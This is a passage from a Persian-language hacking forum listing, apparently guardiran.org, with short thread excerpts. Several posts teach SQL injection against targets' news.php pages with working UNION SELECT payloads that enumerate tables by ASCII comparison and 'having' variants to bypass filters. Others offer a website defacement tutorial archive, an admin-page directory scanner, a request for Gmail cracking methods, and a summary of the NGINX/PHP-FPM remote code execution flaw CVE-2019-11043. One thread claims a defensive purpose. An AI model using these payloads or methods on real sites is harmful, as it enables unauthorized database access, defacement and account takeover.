اجرا می شود . ( پیشنهاد می کنم برای روبرو نشدن با این جور مشکلات از نسخه 2019.4 کالی استفاده کنید . )
  18. MR.MSA

    Download Keyword

    برای پیدا کردن نوع دیتابیس یک سایت می توانید از افزونه های Wappalyzer و WgatRuns که در سایت هم معرفی شده استفاده کنید . در بعضی تارگت ها نمی توانید از این ها استفاده کنید و آن موقع است که از key word ها استفاده می کنیم و فقط باید یک key word را در کنار ادرس سایت قرار دهیم اگر سایت بدون هیچ مشکلی لود شد یعنی از همان دیتابیس استفاده می کند . مثال : site.com/news.php?id=1(key word) (در فایل KeyWords.txt می توانید key word های هر دیتابیس را مشاهده کنید و از آنها استفاده کنید . ) KeyWords.txt
  19. با سلام خدمت کاربران و مدیران عزیز گارد ایران توضیح مختصر در رابطه با جداول (table) تیبل های سیستمی : تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . تیبل های user یا کاربری : تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند . ما قبلا برای محدود سازی از این روش استفاده می کردیم : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()-- و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97-- و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- نکته : در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . امیدوارم لذت برده باشید تشکر فراموش نشه 😅
  20. MR.MSA

    متد Having

    بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
  21. سلام دوستان عزیز. میخواستم بپرسم بهترین راه برای کرک جیمیل چه روشی هست +آموزش ممنون.
  22. با سلام خدمت شما دوستان گرامی بعد از این که متوجه ی این شدم که اموزش های سیستم عامل کالی لینوکس در انجمن دیگر گذاشته نمیشود و دوستان میخواهند که اموزش هارو از صفر یاد بگیرن بنا به این شدم که دست به کار بشم و با کمک دوستان عزیز در انجمن اگر نواقصی دیدن در تاپیک ها کمک کنن تا بر طرف بشه..... دوستان تازه کار و مدیران شبکه و حتی یا وبمستران هم میتوانند از این اموزش ها برای محک زدن امنیت سایت خود استفاده کنند و در صورت مشاهده ی نقطه ی ضعف انرا بر طرف کنند.لطفا از اموزش ها برای افزایش امنیت سایت های خودتون استفاده کنید تا کمتر شاهد هک شدن سایت های ایرانی باشیم. در صورت نیاز به مشاوره و کمک جدی میتونید به صورت پیام خصوصی با ما در تماس باشید. قوانین تاپیک: اسپم ممنوع(دوستان عزیز چون خود اموزش ها طولانی هست لطف کنین و اسپم ندید در صورت مشاهده با کاربربرخورد میشه) ((سوالات خودتون رو درلینک زیر بپرسین تا به انها خودم و یا دیگر مدیران جواب بدن)) http://guardiran.org/forums/topic/2259-سوالات-مربوط-به-بخش-اموزش-کالی-لینوکس/?p=9251 از قرار دادن اموزش های تکراری پرهیز کنین در صورت گذاشتن ابزاری خاص لینک اسکن فراموش نشود با تشکر فراوان از شما دوستان گرامی
  23. درود, آموزش دیفیس(هک) وبسایت با کمک افزونه Noredirect در فایرفاکس سوالی هست زیر همین تاپیک جواب میدم امیدوارم مفید باشه و در راه آموزش استفاده شه! پسورد : guardiran.org Goodzilam.part1.rar Goodzilam.part2.rar
  24. بسم الله الرحمن الرحیم درود ../ آموزش کار با ابزار جدید nullsecurity تحت عنوان lulzbuster در خدمت شما دوستان عزیز هستیم کار ابزار اسکن دایرکتوری های مختلف و همچنین فایل های خاص یک وبسایت هست که بسیار سریع و کم حجم هست میتونید با این ابزار یک اسکن جامع روی تارگت مورد نظر خودتون داشته باشید ( برای پیدا کردن ادمین پیج بسیار موثر هست ) کار با ابزار بسیار ساده هست و هدف صرفا معرفی ابزار هستش ابزار و فیلم آموزش نصب و استفاده پیوست میشه ../ یا حق ../ lulzbuster.zip lulzbuster-1.0.0.tar.xz
  25. بچه ها این آسیب‌پذیری با شماره CVE-۲۰۱۹-۱۱۰۴۳ ردیابی میشه و به مهاجمان اجازه میده تا با دسترسی به یک URL ساخته شده، دستوراتی را روی سرورها اجرا کنن. بهره‌برداری از این آسیب‌پذیری به سادگی انجام میشه و کد اثبات مفهومی (PoC) اون به صورت عمومی توی گیت‌هاب منتشر شده و در دسترس همه هست اسکریپت PoC موجود در گیت‌هاب می‌تونه از طریق وب سرور مورد نظر، وجود آسیب‌پذیری رو بررسی کنه و وقتی که یک هدف آسیب‌پذیر شناسایی بشه، مهاجم میتونه به سرور وب آسیب‌پذیر، درخواست دستکاری شده ارسال کنه البته همه سرورهای مبتنی بر PHP تحت تأثیر قرار نمی‌گیرن و فقط سرورهای NGINX که ویژگی PHP-FPM اونا فعال باشه آسیب‌پذیر هستن